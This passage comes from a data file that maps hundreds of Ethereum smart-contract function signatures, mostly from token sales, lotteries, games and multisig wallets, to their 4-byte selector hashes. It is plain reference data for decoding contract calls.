"Registry(address,address,address,string)": "0xabb58d20", "registerPoA(string,bytes32,uint256[],uint256[],address,address)": "0xa95281f0", "IPToken()": "0x1b0569b2", "getLockedAmount(address)": "0x929ec537", "transferWithLock(address,uint256,uint256[])": "0x627f47c6", "deleteLock(address,uint8)": "0x4bc18a64", "addLock(address,uint256,uint256)": "0xcc9ac376", "decreseApproval(address,uint256)": "0x76f31513", "_preValidateTransfer(address,address,uint256)": "0x4cc2a4bb", "msgSender()": "0xd737d0c7", "ARcoin()": "0x2b0fd89e", "executeCall(address,uint256,bytes)": "0x9e5d4c49", "addToWhiteListMultiple(address[],address[])": "0x4baf4a76", "returnReferral(address)": "0x7ee5c97a", "setDelegateWallet(address)": "0x3ad359cf", "OpenAIChainToken()": "0x83d52f36", "BSmartValueCirculateAssets()": "0xcfeb9ec0", "getBlockPointer()": "0x67b7d525", "getRoundBlockNumber(uint256)": "0x777e479d", "getRoundNumber(uint256)": "0x6497129c", "getRoundBetNumber(uint256,uint256)": "0x2f1cc35b", "getRoundBetAmount(uint256,uint256)": "0x75e87642", "getRoundBetOrigin(uint256,uint256)": "0xc23a25ba", "getRoundNumberOfBets(uint256)": "0x7962525c", "getRoundPrize(uint256)": "0x3915111e", "getRoundMinAmountByBet(uint256)": "0x0595ba4c", "getRoundMaxNumberOfBets(uint256)": "0x4245508a", "getRoundOpen(uint256)": "0x580786cf", "getCurrentRoundId()": "0x5727e25d", "closeRound()": "0xe278fe6f", "createRound()": "0x1b411fc8", "Lotthereum(uint256,uint256,uint256,uint256,bytes32)": "0xe239421d", "GREEN()": "0x78ec96a0", "finalizeTokensale()": "0x244d04f5", "forwardCollectedEther()": "0x3a5167e9", "JustForward(uint256)": "0x1f3d3261", "_magic(uint256)": "0x3a377c82", "RoundIndex()": "0x1974a540", "ironTokensaleRunning()": "0x311c2644", "MultiplesaleAirdrop(address[],uint256[])": "0x7142b191", "saleAirdrop(address,uint256)": "0x2480d9e6", "addRound(uint256,uint256,uint256)": "0x4b778445", "IRONtokenSale(uint256,uint256)": "0x0ac7366b", "tokenSoftcap()": "0xd8fed39e", "TimeFinish()": "0x670c314e", "Raffle_Prize()": "0x5f65545d", "preSaleSecondPrice()": "0x85d1be13", "ZTR_ETH_extra_price()": "0x6611f5f2", "rewardPoolAddress()": "0x845a51ec", "techDevelopmentEthWallet()": "0x312386b7", "discountedDealAmount()": "0xc5f40edd", "maxAmountForSalePromotion()": "0x59622aa6", "promoPause()": "0x09828a47", "saosao3()": "0x5661bcd8", "airdropCountLimit1()": "0xe92ba335", "ICO_BONUS2_SLGN_LESS()": "0x544b9606", "MIN_TOKEN_PRICE()": "0x1879dcf3", "totalFundedEther()": "0x6531dbff", "hasBuyTotal()": "0x14211803", "addr()": "0x767800de", "stakingBonusTokens()": "0xfdc65c8c", "firstPreSaleDate2()": "0x6cbae51b", "allocated3Year()": "0x57bd2a65", "DELTA()": "0xecb5fff6", "bonusThirdWeekPeriod()": "0x444b0c90", "adminOwner()": "0x1417b946", "usdPerHundredEth()": "0xb263f865", "preICOSaleStart()": "0xb8c65462", "limitMaxSupply()": "0x3dc1ef34", "burnMultNom()": "0x69aa2c9f", "collectOwnRew()": "0x7dddb66f", "maxMessageChars()": "0x0c790369", "cofoundersSupply()": "0x0914a363", "singularDTVCrowdfunding()": "0xa9dc1d54", "areTokensFree()": "0xa6c5612e", "noIcoPeriod()": "0x920b0280", "retainBalance()": "0xd80cc340", "secondRoundPercent()": "0xc5b045eb", "setRefunding()": "0x45ab17bf", "team4Token()": "0x7b813089", "fishbank()": "0xe7a2e28e", "releasedAdvisorsTokens()": "0x78e77477", "tokenRewardPreDGZ()": "0x2c344d14", "FINTRUX_RESERVE()": "0xaabdf682", "maxTokenToBuy()": "0x34ebb615", "maxInvestmentInWei()": "0xcfc450af", "SCISSORS()": "0xb357a028", "bountyShare()": "0xc23b4b5b", "finderFee()": "0x1e6b0e44", "WALLET_ALLOCATION()": "0x152592b0", "callerAllocationEndBlock()": "0xdfc10ea8", "numcallsinternal()": "0x8f259117", "ecosystemTokenSupply()": "0x5d6cb67e", "startPresaleTime()": "0xc74b1e01", "pauseRoundD()": "0x581e69de", "nextCommonTTMTokenId3()": "0x3f10f08a", "mainstreetToken()": "0x8bffc74d", "checkUnlockedTokensData()": "0xe3aef2bd", "summFounders2()": "0x0191d35c", "extractApprovedIndexLength()": "0x5c416306", "houseedge()": "0x2560a8c0", "upgradableContractAddress()": "0xa842f0f2", "buyoutFeePercentage()": "0x6451447d", "feePerSec()": "0xb8b2d490", "capDoublingTimestamp()": "0x3053aedc", "voteToFreezeFund()": "0xe2649caf", "get_my_tokens()": "0x454ca9fd", "ETH_MAX_GOAL()": "0x1e9493d8", "winnerLuckyNumber()": "0x4e448ffa", "creatorsCreatedCount()": "0x6a14d131", "ico3endTime()": "0x8fc6bf7f", "getNumEvenSplits()": "0x98cb2342", "TotalCrowdsaleContributions()": "0xb5217c39", "pePrice()": "0x40ab4879", "currentCostToPress()": "0x51f364d5", "rateSoft()": "0x14373817", "maxMintCookie()": "0x99358876", "bonusMilestones()": "0xc9efa392", "crowdsaleSupply()": "0xcdcb3cdb", "PRIORITY_ADDRESS_LIST()": "0xd16865a3", "tradingStarted()": "0x5b4f472a", "ALLOC_SALE()": "0x499fa529", "STAGE_3()": "0xaec72d8d", "finalizeNextUpgrade()": "0x5a149f08", "finalizeTransferAddressType()": "0xa3624b72", "addressCOO()": "0x2f8803bb", "bonusInPhase5()": "0x59366245", "_yearTwoClaimed()": "0x729c04fd", "TOKEN_HODL_9M()": "0x28262dd1", "PUBLIC_SALE_START()": "0x9b11503e", "PUBLICSALE()": "0x0bac15ae", "bestAngel()": "0x378525bd", "maxCapTokenTotal()": "0xfac7b20a", "TRANSFERMANAGER_KEY()": "0x91415ce9", "getOpGas()": "0x9a6921e4", "ledTokensAllocated()": "0x1c9b612e", "unconfirmedSum()": "0xa0493834", "minter_address()": "0xa315acf5", "saleIndex()": "0x6ec012e7", "ethAuction()": "0xc95acadd", "innerlockStartTime()": "0x34835560", "RLCPerSATOSHI()": "0x09ce4a91", "presaleFinishedAt()": "0x00359e08", "minSizeInvest()": "0x17c2d98b", "usdPerKEther()": "0xbb5b586b", "availableFlg()": "0x001246eb", "curReleaseAmount()": "0x9e8bf603", "teame()": "0x2ce946a5", "tier2Timestamp()": "0xdbe3117a", "MIND_FOUNDATION_AMOUNT()": "0xbf5b2e5d", "getAllLoans()": "0xa5bfd16a", "CLASS_BEAST()": "0x4939ce85", "StrategyAddress()": "0x07ca6931", "TIER3END()": "0xce148564", "cost1token()": "0x9518589a", "tokensPerEther_numerator()": "0xf30ba854", "participateCrowdsaleAll()": "0xb8e3e6da", "ableTransfer()": "0x207bd99d", "sitePercent_()": "0xff3bf1f4", "dogeAddress()": "0xdd00182b", "resultsPublishedTime()": "0xac0840db", "gamesCounter()": "0x5eb6a78f", "icoEndTimestampStage4()": "0x4f162f8f", "howManyEthersToBecomeOwner()": "0xe4a46a99", "rewardSent()": "0x53cf51bc", "startRefunds()": "0x2fe9f821", "bcn()": "0xd02a4f84", "DIVIDEND_FUND_FRAC_TOP()": "0xd90025d1", "DURATION_SALESTAGELAST()": "0xa7322d9d", "rewardinterval()": "0x117b652b", "_totalsupply()": "0xa393dc44", "winningChance()": "0xe0a1ca6e", "_totalMinedSupply()": "0x25b3b5a8", "summAirdrop()": "0x52cbfe09", "plot()": "0xda178cb0", "projectAgent()": "0xdb7a2f42", "prebuyPortionTotal()": "0x9b914973", "toekensForBTCandBonus()": "0x20e1063e", "rateIcoMainSale()": "0x51fb4001", "fixPayAmt()": "0x7be4ed55", "ignited()": "0x66092ea8", "operational()": "0x0a401086", "FOUNDER_EXCHANGE_SHARE()": "0x845ec8de", "gameBeginPlayNo()": "0x43133b07", "Test12Address()": "0xdab9afa4", "tokensForFounder()": "0xf180743a", "STAGE_THREE_ETHRaised()": "0xf2405395", "MoccaCoin()": "0xad60540b", "reason()": "0xe134e33d", "exeStatus()": "0xdd87c9f0", "submission_stage_block_size()": "0xebaa32f3", "endICODate()": "0x9f637851", "PLATAMOUNT()": "0x475abbb7", "getAmountLeft()": "0xfd1bd9b0", "sharedExpense()": "0x9d21328f", "gubberment()": "0x61f43285", "hasTerminated()": "0x5f2befb9", "Wallet_Initial_Supply()": "0xd1a2bfaf", "crowdfundStartTime()": "0xaea09e6e", "pieceForSale()": "0x00f733e9", "bookKeeper()": "0xe3b3932a", "feeForFirstArtWorkChangeRequest()": "0x86cb5cdb", "zazSupply()": "0x68ef7946", "howMany()": "0x62ab8cc1", "_batch3_icosaleEndTimestamp()": "0xad869e1a", "reservedTotalSupply()": "0x0e98f811", "MAX_TOKEN_BUYIN()": "0xe0ddaa0e", "messiCommunity()": "0x0bab7ff6", "candyPrice()": "0xa5ade117", "allowPrice()": "0x6a343df3", "TIER1_BONUS()": "0xc1927292", "getCurrentGameInitialMinBetSize()": "0x4becfd56", "FEE_PERMILLE()": "0xde8248fb", "totalSaled()": "0x68e453ed", "INTREPID_VOUCHER_LIMIT()": "0xde5990ca", "privateSaleLimit()": "0xc976ce9c", "tdeStartTime()": "0x44f0a4a8", "weiRaisedTotal()": "0xb3ebc3da", "whitelistWallet()": "0xad38d6f1", "mineblocksAddr()": "0xce627bd9", "seedSingleSaleCount()": "0x8cd6c7fa", "getTotalDeposit()": "0xc022215c", "icoDiscountPercentageLevel3()": "0x210e2484", "ETHERFUNDME_ONLINE_FEE()": "0x49d8ef13", "walletAdvisor()": "0xcd2d5291", "totalApprovedAmount()": "0xb4200294", "maxTrialDrops()": "0xc13e285d", "paymentSizeE()": "0x4176368f", "AdvisorsFund()": "0xf869b3ff", "softCapWei()": "0x5eec9df0", "ResumeTokenContract()": "0x219da4ac", "aPurgeMessages()": "0x8fb67f60", "opsAddress()": "0x8ea64376", "TOKEN_CAP()": "0x9a6524f1", "inflation()": "0xbe0522e0", "tokenSalePausedDuration()": "0x48ea97be", "preIcoStart()": "0x3d741994", "Request_Airdrop()": "0x01ba2bd5", "tokensForfortis()": "0xe45aa608", "maxFoundationCapUSD()": "0x816f3438", "early_bird_minimal()": "0x7c3ba89e", "systemCreatedCount()": "0xacf1b06a", "canIWithdraw()": "0xd71e8296", "JackPot()": "0x0a2282ae", "getContributions(address)": "0x3f19d043", "insert_contribution(address,uint256)": "0xf7c9f74a", "freezeAccount(address,bool)": "0xe724529c", "PointlessCoin(int256,uint256,string,uint8,string,address)": "0xb3ea3924", "enter(address)": "0xd014c01f", "addParticipant(address,address,uint256)": "0x9c7e8a03", "getParticipantByAddress(address)": "0xe837ab59", "moveOldUser(uint256)": "0xe67cdfb7", "Etheramid2()": "0x28f90e4b", "getParticipantCount()": "0xad605729", "getParticipantById(uint256)": "0x53850db3", "majorEventFunc(uint256,bytes,bytes)": "0x73e30e49", "pdfCertificateProof(bytes)": "0x682d3bb0", "createCertificate(bytes,bytes,uint256,bytes)": "0x9844347b", "ConferenceCertificate()": "0x1555e337", "propose(address,bytes,uint256)": "0x31c2bd0b", "easyPropose(address,uint256)": "0xc7d6faf1", "addMember(address,bool)": "0xc9030ea0", "DSEasyMultisig(uint256,uint256,uint256,uint256)": "0xa6a20ff6", "exec(address,bytes,uint256)": "0xad8d5f48", "tryExec(address,bytes,uint256)": "0x64aabe92", "changeOwner(address)": "0xa6f9dae1", "setCustomGasPrice(uint256)": "0xca6ad1e4", "withdrawFunds(address)": "0x68742da6", "multisetCustomGasPrice(uint256[],address[])": "0xd9597016", "multisetProofType(uint256[],address[])": "0xdb37e42f", "deleteCoupon(string)": "0x0f825673", "addDSource(string,bytes1,uint256)": "0xb5bfdd73", "getResults(uint256)": "0x81a60c0d", "getLastResult()": "0x92093dd6", "getPlayerWaiting()": "0xdd10d97e", "getDuel2(uint256)": "0x96f7807a", "getLastDuel2()": "0x67bd69a6", "getFirstActiveDuel2()": "0xb782fc9b", "getDuel1(uint256)": "0x8dc45377", "getLastDuel1()": "0xcb10e0c5", "getFirstActiveDuel1()": "0x717fedf0", "payHouse()": "0xb1418cf4", "payDuel(address,string,address,string)": "0x6f52167d", "manualPayExpiredDuel()": "0x528fd7b0", "updateFirstDuel1(uint256)": "0x2d0104a5", "updateFirstDuel2(uint256)": "0x0cf45ba5", "decryptHand(string,uint256,uint256,uint256)": "0xf91a792e", "reveal(bytes,string)": "0xe1bc3003", "revealScissors(string)": "0x953307d8", "revealPaper(string)": "0xe7740cf9", "revealRock(string)": "0x3f2f46b4", "sendCryptedHand(bytes)": "0xa28ecf0b", "cancelWaitingForOpponent()": "0xb50954b6", "Crypted_RPS()": "0x1ce624d6", "getPlayerStatus(address,uint256)": "0xb2e85b67", "ManagedAccount(address)": "0x656d2f63", "createDAO(address,uint256,uint256)": "0x0b6d8d52", "addAllowedAddress(address)": "0x81788e2b", "payDAO()": "0x3fc6bc94", "TokenSale(uint256,uint256,address)": "0xe8038e25", "buyTokenProxy(address)": "0x13d4bc24", "TokenSale(uint256,uint256)": "0x19901f1d", "transferETH(address,uint256)": "0x7b1a4909", "setTokenHolder(address)": "0xf29d2f28", "tokenSupplyChanged()": "0xdc52696f", "setPrice(uint16)": "0x8ed67a44", "buyTokens(uint16)": "0x0e662cf0", "buyTokens()": "0xd0febe4c", "tokenSupply()": "0x7824407f", "Token_Offer(address,address,uint16)": "0x11103599", "hasPhone(address)": "0xfe97ee88", "getPaymentDataByAddress(address)": "0xa02b9aac", "getPaymentByAddress(address)": "0x1f83f440", "getPhoneByAddress(address)": "0xb958a5e1", "sendEtherToOwner()": "0xe3ffc9a3", "newPhoneToAddr(address,uint256)": "0x4636a159", "PhoneToAddress()": "0xd6f42038", "Game_balance_in_Ethers()": "0xdb641ab4", "Last_block_number_and_bloctime_used()": "0x2c329e99", "Results_of_the_last_round()": "0x6673ce2b", "returnmoneycreator(uint8,uint128)": "0xfd68a422", "checkBet()": "0xc3d23e10", "Set_your_game_number(uint16)": "0x1437f9a3", "Ethereum_eight_bagger()": "0x5f2e686d", "hasPhysicalAddress(address)": "0xd173707d", "deverify(address)": "0x0d368fee", "verify(address)": "0x63a9c3d7", "AddressReg()": "0x293ffca3", "DAOSecurity(address,address,bytes,uint256,uint256,uint128)": "0x6b256f57", "returnRemainingEther()": "0x7648c929", "getLastPayment()": "0xd7ccc2c3", "getDailyWithdrawLimit()": "0xc988d70f", "getMinDailyWithdrawLimit()": "0x0acc4382", "getOneTimeCosts()": "0x550538f6", "getTotalCosts()": "0xf7b89a3e", "DAOTrust(address,address,bytes,uint256,uint256,uint128)": "0x879d46fd", "redeem(uint256)": "0xdb006a75", "issue(uint256)": "0xcc872b66", "unexempt(address)": "0xf9e84395", "exempt(address)": "0xf1320af2", "isValidNym(address)": "0x4cdb48e4", "getNymCenterAPIURL()": "0x5ed84aa6", "getNum(bytes,uint256)": "0x206a44f3", "attachedSystemActive()": "0x6554d179", "rateAge()": "0x064f4fa7", "maxValue()": "0x94a5c2e4", "thirdTimeLine()": "0x355fd8db", "levPerUser()": "0x4e659145", "dateEcoRelease9()": "0x9caabfac", "usedCoreSupply()": "0xe88f4c6f", "isAdvisorsTokensSecondReleased()": "0x1f4ca28f", "acceptToken()": "0x5510f804", "delayedTokenAllocator()": "0xea6cc6e9", "TAAS_CONTRACT()": "0xbca19ca0", "weiRaisedPreSale()": "0x51e94406", "giftMessage()": "0xc2cb88bd", "averageKimSalePrice()": "0xadcde05f", "stakingPercentage()": "0x81e1ccba", "_token()": "0xecd0c0c3", "coldStoreLast()": "0xd6d25008", "LIMIT_PROMO()": "0xf7618a40", "bonusPhaseTwoDeadline()": "0x84fd176b", "SALE_PRICE()": "0x7f205a74", "firstPostIcoContributorId()": "0xa222a52f", "Total_Paid_Out()": "0xb67c838f", "Winn()": "0x53e8c040", "amountAvailable()": "0x3c799547", "preSaleEnded()": "0xa0426fb2", "addChunk2ToWhiteList()": "0x526de5ea", "crowdsaleStopDate()": "0x660c6813", "Chi_available()": "0x75d14478", "betInfoIsLocked()": "0xcd5d6c2b", "getDonatorsNumber()": "0xb57c5814", "poolDLock()": "0x1cd8b96c", "icoBegintime()": "0xe6136d84", "purpose()": "0x70740aab", "oracleURL()": "0x4b6ea677", "tokensICO()": "0x721ed9ec", "whiteListPeriod()": "0x3e6e0adf", "lender()": "0xbcead63e", "DISCOUNT_STAGE_TWO()": "0xa58561ec", "howManyGuaranteed()": "0x114b4f1c", "migrationRewardTotal()": "0x0d60e231", "tgeSettingsPartFounders()": "0x23bf2973", "deadlineThree()": "0x6f70a22f", "countCars()": "0x5bd1b8c5", "SaddleShopSaleFee()": "0x1104e09e", "lpc()": "0x02395e9b", "discountRatePreIco()": "0x55e37cec", "validUntil()": "0xddac6654", "BITCLAVE_AMOUNT()": "0xb2a780e4", "availableRef()": "0x95e87385", "gameRound()": "0xa5f9b5c2", "coinIssuedEtc()": "0xd5c7bcc8", "mutable()": "0xa5536fe7", "districtContractAddress()": "0x20f317fb", "hasTeamKeepingWithdraw()": "0x2d936763", "TOTAL_VALUE()": "0xbf3c685f", "lockDeadline()": "0xfa4d0c3c", "TOKEN_OWNER()": "0xff6c33e6", "starEthRate()": "0xd489b701", "infoTier()": "0x1a05619b", "betAmount()": "0xd24257c0", "refundManagerContractAddress()": "0xd19b8d87", "ownerRequired()": "0xa8cb7b4f", "selling()": "0x23aed228", "COIN_SUPPLY_MARKETING_TOTAL()": "0x77e17191", "MAX_PREICO_SUPPLY()": "0x2ad02172", "totalAmountOfPresalePurchasesWithoutBonus()": "0xed505d3e", "icoHardcap()": "0xdf6abd34", "totalCommonWithdrawSupply()": "0xf77404e5", "increaseReward()": "0xff28bcc2", "maxTotalAmount()": "0x8e101867", "Lockup()": "0xcbdf8692", "ico1stPrice()": "0x3b270710", "ICO_PHASE3_LIMIT()": "0xd66c7faa", "STATS_SIZE()": "0x764b08c3", "Total_Deposited()": "0xb2cb9f05", "totalFreeTokensDistributed()": "0x9363fb71", "ubdateBTC()": "0xef2e95d7", "StrimTeam()": "0x1a9f66c4", "feePayed()": "0xa314dc2d", "secretHash()": "0xd29e6803", "teamKeepingLockEndBlock()": "0x7e23f7cd", "tgeSettingsAmountCollect()": "0xb3f8bef1", "t_1st_StageEnd()": "0xc647c3d9", "successorAddress()": "0x1d88c05b", "presaleLimitReached()": "0x119dd1b0", "CHGUSDPRICE()": "0x93de6c51", "associatedContract()": "0xaefc4ccb", "ICO1Period()": "0xcf7e01ba", "dateEco()": "0xb0c4b3bb", "NewsContractEntity()": "0xe8be2e8e", "leekStealTracker_()": "0x9df94560", "withdrawICOReserve()": "0x13ddecd5", "priceUpdatedTime()": "0x9a999359", "crowdsaleLock()": "0x97e18af3", "normalRoomMax()": "0x977174ff", "clientmanager()": "0x55cfa833", "getFunctionSignatures()": "0xb09df36a", "communitySupply()": "0xfcceea26", "ico3receivedTotal()": "0xd8e71b35", "depositOpen()": "0x273cc2a5", "ProofOfHumanityAddOn()": "0x2aec3a71", "setBlockDelay(uint256)": "0xfa67ae5a", "VestingContract()": "0xedad7f9b", "getParentUser(address)": "0xe613d3b2", "checkExistAddress(address)": "0x2a1727f8", "getLastIndex()": "0x3e1a9300", "getNextBackUserId()": "0x2fed7da0", "getNextForwardUserId()": "0xac42f301", "_queue(address,address)": "0x4cd28aa6", "_removeIndex(uint256)": "0xe6135ffe", "serchIndexByAddress(address)": "0x4f1069ad", "startQueue(address)": "0x2da9d048", "HCLCToken(uint256,string,string)": "0x89597595", "stakingRequirement()": "0x56d399e8", "IndexEmpireToken()": "0xcddc028b", "TotiMed()": "0x96f1370d", "getAllArtworks()": "0x9c0cc30c", "getAllShareholdersOfArtwork(uint256)": "0x7315acc8", "purchaseSharesOfArtwork(uint256)": "0x01f89de0", "withdrawAmount(uint256,address)": "0xff423357", "toggleArtworkVisibility(uint256)": "0x57aaafe2", "renameArtwork(uint256,string)": "0xf5ff8977", "createArtwork(string,address,uint256)": "0x9e67fa6a", "LimeEyes()": "0x0df9178f", "TrueWorld(uint256,string,string)": "0xa362cf0c", "isClosedAndValid()": "0xfad5a2af", "goToNextStep()": "0x6dcba059", "LYBToken(string,uint8,string)": "0xf083156c", "CRPA()": "0x15c6b117", "setKyberNetworkContract(address)": "0xabd188a8", "SbuyToken(address,address)": "0x0f2284cc", "GOOGToken()": "0x55380ed8", "Trc(uint256,string,string)": "0x8fdb385b", "setENS(address)": "0x71bf5a95", "ENSResolver(address)": "0x4b1fe17e", "IoMTToken()": "0x22da3368", "XinXianToken(address,uint256)": "0x118654f1", "descentX()": "0x83a41f93", "_FreeDom()": "0x64bebead", "GYUToken()": "0x24b2c2f6", "Cogenero(uint256,uint256,uint256,address)": "0xe250ecfe", "buy10(address[],address[],uint256[],bytes,bytes,bytes,bytes,bytes,bytes,bytes,bytes,bytes,bytes)": "0x79459ac3", "mulTransfer(uint256,address[])": "0x1321ea19", "mulPay(address[],uint256[])": "0x48e3a033", "BCBToken()": "0xc4184def", "GOOGLE()": "0x574a89e9", "FBToken()": "0x2dca374f", "Europium()": "0xab02f27c", "BotpyToken(uint256,string,string)": "0x0e3c8068", "depositOrWithdraw(address)": "0xfc1c9620", "IMEIM()": "0x8424f952", "Nitrogen()": "0x05f36283", "asktoken()": "0xebd0f599", "BURENCY()": "0x40652435", "asyncSend(address,uint256,uint256)": "0xf64fe563", "_getEndOfLastMiningDay()": "0x5284e660", "updateLastMiningTime(uint256)": "0xd3f1fbd7", "setLastRewardTime(uint256,uint256)": "0xa8fa6e14", "_calculateReward(uint256)": "0x75247ccb", "getMiningReward(uint256)": "0x3a6eb318", "setMiningToken(address)": "0x9fdf057f", "setFund(address)": "0x0e21750f", "miningTokensOf(address)": "0xf156deb2", "sendReward(uint256[])": "0x5a51d1df", "getLastRewardTime(uint256)": "0x8a69218c", "checkReward(uint256[])": "0x15b56b44", "getReward(uint256[])": "0x6e1286fc", "buyHLPMT()": "0xf03de5fe", "getTokensCount(address)": "0x2ac48524", "getTokenTime(uint256)": "0x972041e4", "multiMint(address,uint256)": "0x2649d62e", "getMaxTotalSupply()": "0x5db30bb1", "updatCokeTotal(uint256,uint16)": "0x066aa53b", "updateWeedTotal(uint256,uint16)": "0x5d4521dd", "setTokenAddresses(address[6])": "0x73228786", "funderWithdraw()": "0xb6ef4454", "KnowHowChain()": "0xdf590d89", "getValidityBondAttoeth()": "0x7e94cf0c", "SparksterToken()": "0x84e83ee2", "KODO()": "0xc81e05ad", "OD1Coin(uint256)": "0x22d0d31f", "MUBEX()": "0xc8ec2eb8", "sendWinnings(address[],uint256[])": "0x35f10cc3", "DACCToken()": "0xef922305", "PGDA()": "0x143580d0", "KOALAPROJECT()": "0x7493539b", "EICQERC20()": "0x94d54581", "LuvCoin(uint256)": "0x4f6d150d", "Competition(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x549060bb", "getKeyValue(address,string)": "0x8016b6ed", "GameBit()": "0x55ea2cf3", "IntegrationOfCredit()": "0xc543b427", "payWinners(address[20],uint256[20])": "0xeb4b8091", "importBalances(address,address[])": "0xab9fe3a1", "importPreviousWinners(uint256[],address[],uint256[])": "0xf6b69697", "rand(uint256,uint256,uint256)": "0xe90e5453", "giveTix(uint256,address)": "0x2341d778", "getTicketsSoldToday()": "0x8b048091", "setPrizes(uint256[28])": "0x490f027a", "dailyReset()": "0x268fe426", "_airdropLimit()": "0x0cf868bf", "donationPhase()": "0x2070b6de", "partnersRelease()": "0xd7760500", "required_number_players()": "0xa56befd1", "tokenAdvisoryBountyTeam()": "0x23f806b7", "gen0StartingPrice()": "0xae4d0ff7", "currentCoinsCreated18Decimals()": "0xbfbccfae", "maxPreIcoDuration()": "0x42ad2c6f", "periodITO_mainCapInWei()": "0x0996e0e5", "unclaimedPlotPrice()": "0x689f3f99", "endIcoMainSale()": "0x243eb89f", "cancelCodeUpdate()": "0x950dff20", "customGasPrice()": "0x4b0720a7", "exchangeEnableCost()": "0x7896cd95", "batchAssignStopped()": "0x0f6413b7", "Test3()": "0xbb1af82b", "rewardDistributionStart()": "0x7464d5d8", "finishPrivatePlacement()": "0xd46c0f40", "presaleEndTimestamp()": "0x78da7ba1", "unicornRanchAddress()": "0x31212a6b", "thirdStageDiscountPriceOfTokenInWei()": "0xd8a506f3", "numBountyCredits()": "0x5a650f45", "AddrPartnerPocket()": "0xcaade55b", "ceoDevfund()": "0x93bc771a", "releaseTime1()": "0x145f3143", "KYC_VERIFICATION_END_TIME()": "0x7f2a4784", "incentiveTokensLimit()": "0x5b3b449f", "getMarket_CommunitUnusedTokens()": "0xb7c7986f", "publishingOwner()": "0x0533073c", "TotalTokens()": "0x71e70133", "tokenForSP()": "0x58f693de", "swapAddress()": "0x80f6d782", "competitionStatus()": "0x268a4559", "roundID_()": "0xa35aae9c", "maxCoinSides()": "0x27e152bb", "founder_token()": "0x6f159c4f", "invitedReward()": "0x362c78b9", "highRate()": "0x0b9b0e7d", "contributorPoolAddr()": "0x7b146f6f", "totalRemainingTokensForSales()": "0xaaff2a83", "sellFee()": "0x2b14ca56", "tokensForCreators()": "0x588268a8", "eosCrowdsaleAddress()": "0xad29ca6d", "lastAddress()": "0xcd68100c", "PRESALE_VAULT_START()": "0xfff9627d", "ethFundManager()": "0xee09ae4a", "consolationRewardsPercent()": "0xeb95264c", "countAddress()": "0x42154e9c", "contractCreationBlockTime()": "0xcadb48d9", "IcoStartTime()": "0xec6f509e", "priceDecraseTime2Action()": "0x1023d597", "platformSupplyRemaining()": "0x417ea2dc", "walletOEM()": "0xf9ef33ff", "phase1Cap()": "0xe9629d7f", "pbWinner()": "0xfa5252e4", "firstTokenExchangeRate()": "0x1eaa6c4b", "secondWalletPercent()": "0xbe2ef9f0", "interestNextInPercent()": "0x74664b34", "m_changeable()": "0xe21b9d08", "initialStartPrice()": "0x8b9c7a36", "purchaseHalted()": "0xfe9c3c28", "WALLET_TEAM()": "0x3a920766", "mainFundAccount()": "0x3eb78420", "changeMintingState()": "0x782841cd", "PriceManual()": "0x50feacc5", "lastBlock_a1Hash_uint256()": "0x8c717138", "SATS_TO_TOKENS()": "0xfa2dedec", "tokenWeiToSale()": "0x8ed20fa0", "maxSGTSupply()": "0x092c506e", "baseKernel()": "0xb16dd130", "bttsToken()": "0xed62543d", "exchangeAdmin()": "0x42efdebf", "icoTokensUnsold()": "0x92e4cd75", "awardsEnd()": "0x32b734b7", "weiPixelPrice()": "0xd5bec84e", "ONE_TOKEN()": "0xe443348e", "registrarOwner()": "0x1cb82d79", "etherFeePercent()": "0xcb64d74d", "AVAILABLE_PRESALE_SUPPLY()": "0x12e43d92", "SHA256ofArtwork()": "0xb686e44c", "LEDTEAM_TOKENS()": "0x87c5d1be", "RESERVED_TOKENS_BOUNTY()": "0x7e9e3b3b", "NRB_address()": "0x620892bd", "dataSource()": "0x1b076edc", "VicoOwner()": "0x2a608c0c", "numberOfOutcomes()": "0x49200d77", "DATE_31_DEC_2021()": "0x365e304d", "tokenUSDRate()": "0xf2eb5dd3", "claimBrokerFee()": "0x01f81649", "presaleStartsAt()": "0x2e609c10", "LimitOfMinutes()": "0x54cbffc4", "contractCreatedCount()": "0xc762547d", "vestingAmount()": "0x00728f76", "weiContributed()": "0x2f782b32", "commitThreshold()": "0xec1e74a7", "NAME_HAWKING()": "0x835fcab3", "totalEthers()": "0x0a4625af", "secondExtendedBonusSalesEnds()": "0xf46b986a", "advisorsPeriodLength()": "0xbebe3c88", "ContractDisabledBlock()": "0xd88bfbad", "setEggPrice(uint128)": "0xe727de55", "FOLIToken()": "0xe39ebde9", "MolToken()": "0x1219bcfc", "RhodonToken(address)": "0xd32ef1e5", "ownedBalance(address)": "0x03547e53", "addOwner(address,uint256,uint256)": "0xa349bfa2", "addOwners(address[],uint256[],uint256[])": "0x0f63d864", "VitalKey()": "0xd6291f6f", "GSH(uint256,string,string)": "0x50d7da00", "isNotarized(bytes32)": "0xfe6ad6c6", "notarize(bytes32,uint256)": "0xf0995961", "kscBatchTransferToBounty(address,address[],uint256[],uint256,uint256[],string)": "0xe1567997", "kscBatchTransferToEcosystem(address,address[],uint256[],uint256,uint256[],string)": "0x31b9d81d", "kscBatchSellByOtherCoin(address,address[],uint256[],uint256,uint256[],string)": "0xdf2a6e4f", "kscSell(address,address,uint256,string)": "0xc926aae6", "kscBatchBurnWhenUseInSidechain(address[],uint256[],string)": "0x1773234b", "kscBurnWhenUseInSidechain(address,uint256,string)": "0x52a8fe93", "kscBatchBurnWhenMoveToMainnet(address[],uint256[],string)": "0x19c46f51", "kscBurnWhenMoveToMainnet(address,uint256,string)": "0x7c39759b", "kscBurnFrom(address,uint256,string)": "0xbebb7e60", "kscMintTo(address,uint256,string)": "0xe32381b6", "kscDecreaseApproval(address,uint256,string)": "0xb31c5c64", "kscIncreaseApproval(address,uint256,string)": "0x1b354a30", "kscApprove(address,uint256,string)": "0x2966e97b", "kscTransferFrom(address,address,uint256,string)": "0xc79ba27d", "kscTransfer(address,uint256,string)": "0x803cc0d0", "getMyUnlockValue()": "0x4aa678c3", "setLockValue(address,uint256,string)": "0xd712800f", "unlockTo(address,string)": "0x003078b0", "lockTo(address,string)": "0x6bd5e26a", "transferMultiSameVaule(address[],uint256)": "0x4e6b97f3", "unApprove(address,uint256)": "0x3104b21a", "addLockStep(uint8,uint256)": "0x79af6547", "Clockpay()": "0xdb192761", "triggerStealManually2(string)": "0xa05a1218", "supplyOf(string)": "0x3cda0103", "balanceOf(string,address,address)": "0x37fd686f", "mint(string,uint256)": "0x056b01ce", "startPostIco(uint256)": "0xe55b69b3", "startPreIco(uint256)": "0x436d796c", "startPrePreIco(uint256)": "0xa004737a", "BTToken(uint256,string,uint8,string)": "0x8bc70769", "JMTOKEN(uint256,string,string)": "0x2a316353", 